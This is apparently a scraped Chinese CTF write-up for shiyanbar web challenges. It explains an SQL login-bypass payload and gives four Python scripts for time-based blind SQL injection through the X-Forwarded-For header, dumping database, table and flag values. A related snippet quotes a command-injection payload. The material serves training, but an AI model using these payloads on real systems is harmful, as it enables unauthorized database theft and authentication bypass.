1.http://ctf5.shiyanbar.com/web/wonderkun/web/index.html

用户名我输入:or'xor"and"select"union'

结果给我过滤成了:

可见该过滤的都过滤了,但是唯独单引号以及双引号都没过滤。这里就可以想到万能密码了。

猜想其sql语句为:select * from admin where username = ' ' and password = ' ';

可以那么写:

username: def' = '0

password :def' = '0

然后就组成了

select * from admin where username = 'def' = '0' and password = 'def' = '0';

def是我随意输入的一个字符所以肯定不是正确的密码,不是正确的密码就会返回false,而false等同于0。那么便会导致其sql语句成立进而绕过登陆。

2.http://ctf5.shiyanbar.com/web/wonderkun/index.php

看到IP,这里能想到的也就是x-forwarded-for IP伪造注入了。这里的注入实在搞了很久。  

爆裤

# -*- coding:utf-8 -*-

import requests

import string

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

guess = string.lowercase+string.uppercase+string.digits+string.punctuation

database=[]

for database_number in range(0,100):        #假设爆破前100个库

    databasename=''

    for i in range(1,100):                  #爆破字符串长度,假设不超过100长度

        flag=0

        for str in guess:                   #爆破该位置的字符

            #print 'trying ',str

            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}

            try:

                res=requests.get(url,headers=headers,timeout=4)

            except:

                databasename+=str

                flag=1

                print '正在扫描第%d个数据库名,the databasename now is '%(database_number+1) ,databasename

                break

        if flag==0:

            break

    database.append(databasename)

    if i==1 and flag==0:

        print '扫描完成'

        break

for i in range(len(database)):

    print database[i]

爆表明

# -*- coding:utf-8 -*-

import requests

import string

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

guess = string.lowercase+string.uppercase+string.digits+string.punctuation

database=[]

for table_number in range(0,500):

    print 'trying',table_number

    headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}

    try:

        res=requests.get(url,headers=headers,timeout=4)

    except:

        print table_number

        break

爆列名

# -*- coding:utf-8 -*-

import requests

import string

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

guess = string.lowercase+string.uppercase+string.digits+string.punctuation

tables=[]

for table_number in range(41,42):           #假设从第60个开始

    tablename=''

    for i in range(1,100):                  #爆破字符串长度,假设不超过100长度

        flag=0

        for str in guess:                   #爆破该位置的字符

            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}

            try:

                res=requests.get(url,headers=headers,timeout=4)

            except:

                tablename+=str

                flag=1

                print '正在扫描第%d个数据库名,the tablename now is '%(table_number+1) ,tablename

                break

        if flag==0:

            break

    tables.append(tablename)

    if i==1 and flag==0:

        print '扫描完成'

        break

for i in range(len(tables)):

    print tables[i]

保出内容

#-*-coding:utf-8-*-

import requests

import string

url="http://xxx"

guess=string.lowercase + string.uppercase + string.digits

flag=""

for i in range(1,33):

   for str in guess:

     headers={"x-forwarded-for":"xx'+"+"(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(5) else 1 end ) and '1'='1" %(i,str)}

     try:

         res=requests.get(url,headers=headers,timeout=4)

     except requests.exceptions.ReadTimeout, e:

         flag = flag + str

         print "flag:", flag

         break

print 'result:' + flag

//作者:Ovie

//链接:http://www.jianshu.com/p/5d34b3722128

//來源:简书

//著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

  

代码:http://blog.csdn.net/qq_35078631/article/details/54773769

实验吧 web题writeup的更多相关文章

  1. 实验吧web题:

    实验吧web题: 这个有点简单 因为刚了解sqlmap,所以就拿sqlmap来练练手了 1,先测试该页面是否存在sql注入漏洞 2.找到漏洞页面,复制url,然后打开sqlmap 先查看当前数据库 然 ...

  2. 实验吧web题(26/26)全writeup!超详细:)

    #简单的SQL注入 http://www.shiyanbar.com/ctf/1875 1)试着在?id=1,没有错误 2)试着?id=1',出错了,有回显,说明有注入点: You have an e ...

  3. 实验吧 Web的WriteUp

    每次看别人的Writeup都有一种感觉,为什么有了WriteUp我还是不会,每次都打击自己的积极性,所以自己尝试写一篇每个萌新都能看懂的Writeup. 0x01 天下武功唯快不破 题目提示 : 看看 ...

  4. ISG2018 web题Writeup

    0x01.命令注入 这题可以使用burpsuite扫出来,但是可能需要测一下. 得知payload为:i%7cecho%20gzavvlsv9c%20q9szmriaiy%7c%7ca%20%23'% ...

  5. SycSec成都信息工程大学2019CTF-前五道WEB题writeup

    一.WEB (1)一起来撸猫 flag藏在标签的注释内  <!--这是注释--> (2)你看见过我的菜刀么 eval漏洞 利用蚁剑连接 连接密码就是要post传的参数 连接成功后在网站根目 ...

  6. CTFHub Web题学习笔记(SQL注入题解writeup)

    Web题下的SQL注入 1,整数型注入 使用burpsuite,?id=1%20and%201=1 id=1的数据依旧出现,证明存在整数型注入 常规做法,查看字段数,回显位置 ?id=1%20orde ...

  7. i春秋CTF web题(1)

    之前边看writeup,边做实验吧的web题,多多少少有些收获.但是知识点都已记不清.所以这次借助i春秋这个平台边做题,就当记笔记一样写写writeup(其实都大部分还是借鉴其他人的writeup). ...

  8. jarvis OJ WEB题目writeup

    0x00前言 发现一个很好的ctf平台,题目感觉很有趣,学习了一波并记录一下 https://www.jarvisoj.com 0x01 Port51 题目要求是用51端口去访问该网页,注意下,要用具 ...

  9. 20155201 网络攻防技术 实验九 Web安全基础

    20155201 网络攻防技术 实验九 Web安全基础 一.实践内容 本实践的目标理解常用网络攻击技术的基本原理.Webgoat实践下相关实验. 二.报告内容: 1. 基础问题回答 1)SQL注入攻击 ...

随机推荐

  1. Swift 基础知识

    前言 Swift 是一门强类型语言,全面支持 Unicode 编码. Swift 中的定义和实现是在同一个单元中的,通常一个 Swift 源代码单文件是以 .swift 结尾的. Swift 不需要单 ...

  2. aaronyang的百度地图API之LBS云 笔记[开发准备]

    我的脚印 1.注册百度账号 先到163邮箱注册个邮箱(注册邮箱),用这个邮箱注册百度账号(注册百度),激活百度账号 2.登陆百度账号,进入 百度地图 申请为LBS开发者 2.1 注册申请为百度开发者( ...

  3. MyEclipse或Eclipse中project的导入和导出

    project的导入:将project放到对应的目录中--打开MyEclipse--光标定位在PackageExp位置(即project创建位置),右键选中并点击"Import-" ...

  4. Redis介绍及安装

    官网:https://redis.io/ Redis中文社区:http://www.redis.net.cn/ Redis教程:http://www.redis.net.cn/tutorial/350 ...

  5. ACM会议列表与介绍(2014/05/06)

    Conferences ACM SEACM Southeast Regional Conference ACM Southeast Regional Conference the oldest, co ...

  6. 使用OkHttpClient处理json请求处理的方式

    今天遇到一个问题,重构老系统时,前端传递的参数是一个json,controller层可以用@ResponseBody来接收. 因为新系统用的是spring cloud这一套,调用其他服务使用的是fei ...

  7. AndroidStudio创建项目时一直处于building“project name”gradle project info的解决办法

    AndroidStudio创建项目,最后一步finish后,一直长时间处于building“project name”gradle project info,界面就一直停留在如图所示: 谷歌自家的产品 ...

  8. php分享二十三:字符编码

    1:ASCII 在计算机中,所有的数据在存储和运算时都要使用二进制数表示(因为计算机用高电平和低电平分别表示1和0),例如,像a.b.c.d这样的52个字母(包括大写).以及0.1等数字还有一些常用的 ...

  9. MySQL5.7.11免安装版的安装和配置:解决MYSQL 服务无法启动问题

    在http://dev.mysql.com/downloads/mysql 这个官网下载MySQL5.7.11 ZIP Archive版本号: watermark/2/text/aHR0cDovL2J ...

  10. 设计模式-单例模式(Singleton Pattren)(饿汉模式和懒汉模式)

    单例模式(Singleton Pattren):确保一个类在整个应用中只有一个实例,并提供一个全局访问点. 实现要点: 1. 私有化构造方法 2. 类的实例在类初始化的时候创建 3. 提供一个类方法, ...